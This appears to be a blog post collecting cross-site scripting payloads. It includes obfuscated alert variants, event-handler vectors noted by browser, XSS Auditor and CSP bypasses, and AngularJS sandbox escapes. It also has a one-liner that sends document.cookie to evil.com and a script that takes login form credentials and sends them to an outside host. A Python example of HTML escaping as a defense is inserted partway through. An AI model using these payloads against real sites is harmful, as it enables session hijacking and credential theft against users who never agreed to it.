4 Sep

Title: XSS collection post

Author: admin

Browser Security I / Chrome XSS Auditor bypass

HTML5 Security Cheatsheet

XSS Polyglot Challenge v2

eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
setTimeout('ale'+'rt(2)');
constructor.constructor("aler"+"t(3)")();
[].filter.constructor('ale'+'rt(4)')();
top["al"+"ert"](5);
new Function`al\ert`6``;
top[8680439..toString(30)](7);
top[/al/.source+/ert/.source](8);
top['al\x65rt'](9);
setInterval('ale'+'rt(10)');
open('java'+'script:ale'+'rt(11)');
location='javascript:ale'+'rt(12)';
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29`;

<svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//
<svg•onload=alert(1)>
<svg><script>alert(1)<b>test</b> (Edge)
<applet onerror=alert('xss')> (IE5-11, Edge)
<div onfocus=alert('xx') id=xss style=display:table> (IE8-11)
<details ontoggle=confirm(1)> (Chrome only)
<input type="search" onsearch=prompt(1) autofocus> (Chrome only)
<input type="text" value="@saamux" onclick="window.onerror=alert;throw 'This is Vulnerable'">
<video><source onerror=javascript:prompt(911)>
<base href="data:\"><link rel=import href='q,<script>alert(1)</script>'> (Chrome only)
<frameset/onpageshow=alert(1)>
<x id=y style=transition:1s tabindex=1 onwebkittransitionend=alert(1)> (Chrome only)
<meta http-equiv=refresh content="0;url=data:,<script>parent.location.replace('javascript:alert(document.domain)')</script>"> (Edge uXSS)
?xss=<link rel=import href=https:html5sec.org/ (Chrome, http page)
?xss=<meta http-equiv=Content-Security-Policy content=upgrade-insecure-requests><link rel=import href=http:html5sec.org/ (Chrome, https page)
<div%20style=-webkit-user-modify:read-write%20onfocus=alert(1)%20id=x>#x
<div%20style=-webkit-user-modify:read-write-plaintext-only%20onfocus=alert(1)%20id=x>#x
<div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll=alert('xss')> (MSIE10-11)
<div style=writing-mode:tb;overflow:scroll onscroll=alert(1)> (works in all browsers)
<svg/%00%0a%ff/+X/%ff.\/onload=c&#111;nfirm(document.domain)<h1></h1>/>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter><br>
<meter onmouseover="alert(1)"
<object allowscriptaccess=always><param name=url value=https://b.cp0.win/xss.swf>
or: <object allowscriptaccess=always><param name=code value=https://l0.cm/xss.swf>
String['fromCharCode'], document['cookie']
<svg><animate href=#x attributeName=href values="&#x3000;javascript:alert('XSSAuditorBypassWithSVGAnimationsAgain')"/><a id=x><circle r=100>
<img src="data:image/svg+xml,<meta xmlns='http://www.w3.org/1999/xhtml' http-equiv='Set-Cookie' content='X' />"> (Firefox)
<button onauxclick=alert(1)>Right-Click Me</button> (Firefox)
SVG XSS vector (save as .svg): https://pastebin.com/raw/KwYNFrCz
<////--><details open ontoggle=confirm(1)>

Payload without characters such as "alert":
document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random}${`_`}${escape.call`${document.getElementsByTagName`link`.item.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join}`;

【CSP bypass】

Collection of CSP bypasses

Evading CSP with DOM-based dangling markup

CSP does not prevent meta redirects: <meta http-equiv="refresh" content="1; url=...
<script>window.location = "httx://evil.com/" + document.cookie</script> (CSP bypass)

XSS Auditor bypass:
<br>%00%00%00%00%00%00%00<script>alert(1)</script>
<embed/src=/brute//alert(document.domain)><base/href=javascript:%5C

When the injection point is inside an <input> tag: if the type attribute comes after the injection point, you can simply set type yourself to bypass it. Otherwise the only options are accesskey="X" onclick="alert(1)">, triggered by pressing ALT+SHIFT+X, or x" type=image src=http://aaaa.com, where x makes an outbound request and sensitive information can be obtained from the Referer.

Tags that take precedence over a " (double quote): <!-- <iframe> <noframes> <noscript> <script> <style> <textarea> <title> <xmp>
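The two injection contexts just described (a value inside an <input> attribute, and the content of a raw-text element such as <textarea>) are where contextual output encoding is the fix. The following Python is an added example, not from the original post: the two page templates, the sample inputs and the parser-based check are all constructed here, and it uses only the standard library (html, html.parser) to show how a parser sees the vulnerable rendering versus the encoded one.

```python
import html
from html.parser import HTMLParser


class TagCollector(HTMLParser):
    """Record every start tag and its attribute list in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        # attrs is a list of (name, value); value is None for bare attributes
        self.tags.append((tag, list(attrs)))


def parse_tags(markup):
    """Return [(tag_name, [(attr_name, attr_value), ...]), ...] for markup."""
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def tag_names(markup):
    """Start-tag names in the order a parser emits them."""
    return [name for name, _ in parse_tags(markup)]


def attribute_names(markup, tag):
    """Attribute names the parser assigns to the first <tag> found in markup."""
    for name, attrs in parse_tags(markup):
        if name == tag:
            return [attr for attr, _ in attrs]
    return []


# --- vulnerable renderings: user data concatenated straight into the template ---

def render_input_unsafe(value):
    # type="text" is fixed before the injection point, i.e. the case the post
    # describes as needing an accesskey/onclick or type=image breakout
    return f'<input type="text" value="{value}">'


def render_textarea_unsafe(text):
    # raw-text content: only a literal </textarea> can end it, so an
    # unencoded closing tag in the data hands control back to the tokenizer
    return f'<textarea>{text}</textarea>'


# --- hardened renderings: encode for the context the data lands in ---

def render_input_safe(value):
    # quote=True encodes " and ' as well as < > &, so the value can neither
    # terminate the attribute nor start a new tag
    return f'<input type="text" value="{html.escape(value, quote=True)}">'


def render_textarea_safe(text):
    # encoding < is what keeps a </textarea> out of the raw-text content
    return f'<textarea>{html.escape(text, quote=False)}</textarea>'


# Constructed sample inputs shaped like the two breakouts discussed above
ATTR_PAYLOAD = 'x" accesskey="X" onclick="alert(1)'
TEXT_PAYLOAD = '</textarea><script>alert(1)</script>'


if __name__ == "__main__":
    print(attribute_names(render_input_unsafe(ATTR_PAYLOAD), "input"))
    print(attribute_names(render_input_safe(ATTR_PAYLOAD), "input"))
    print(tag_names(render_textarea_unsafe(TEXT_PAYLOAD)))
    print(tag_names(render_textarea_safe(TEXT_PAYLOAD)))
```

The check deliberately looks at what the parser produces rather than at the string: the unsafe input rendering yields four attributes (type, value, accesskey, onclick), the encoded one yields only type and value with the whole payload kept inside value, and the encoded textarea never produces a script start tag.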

【AngularJS Sandbox Bypass Collection】

DOM-based AngularJS sandbox escapes:
Versions 1.3.0 - 1.5.7: {{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')}}
Versions 1.2.20 - 1.2.29: {{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",alert(alert=1),"')}}
Version 1.2.19: {{c=toString.constructor;p=c.prototype;p.toString=p.call;["a","alert(1)"].sort(c)}}
Versions 1.2.6 - 1.2.18: {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
Versions 1.2.0 - 1.2.5: {{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",alert(alert=1),"')}}

Direct phishing via XSS:
javascript:user=document.getElementsByClassName('form-control required')['userName'].value;pw=document.getElementsByClassName('form-control required')['password'].value;alert('thanks, i'll send'+user+':'+pw+' to meowz.h4x.tv now :)');document.location='http://meowz.h4x.tv/?log='+user+':'+pw
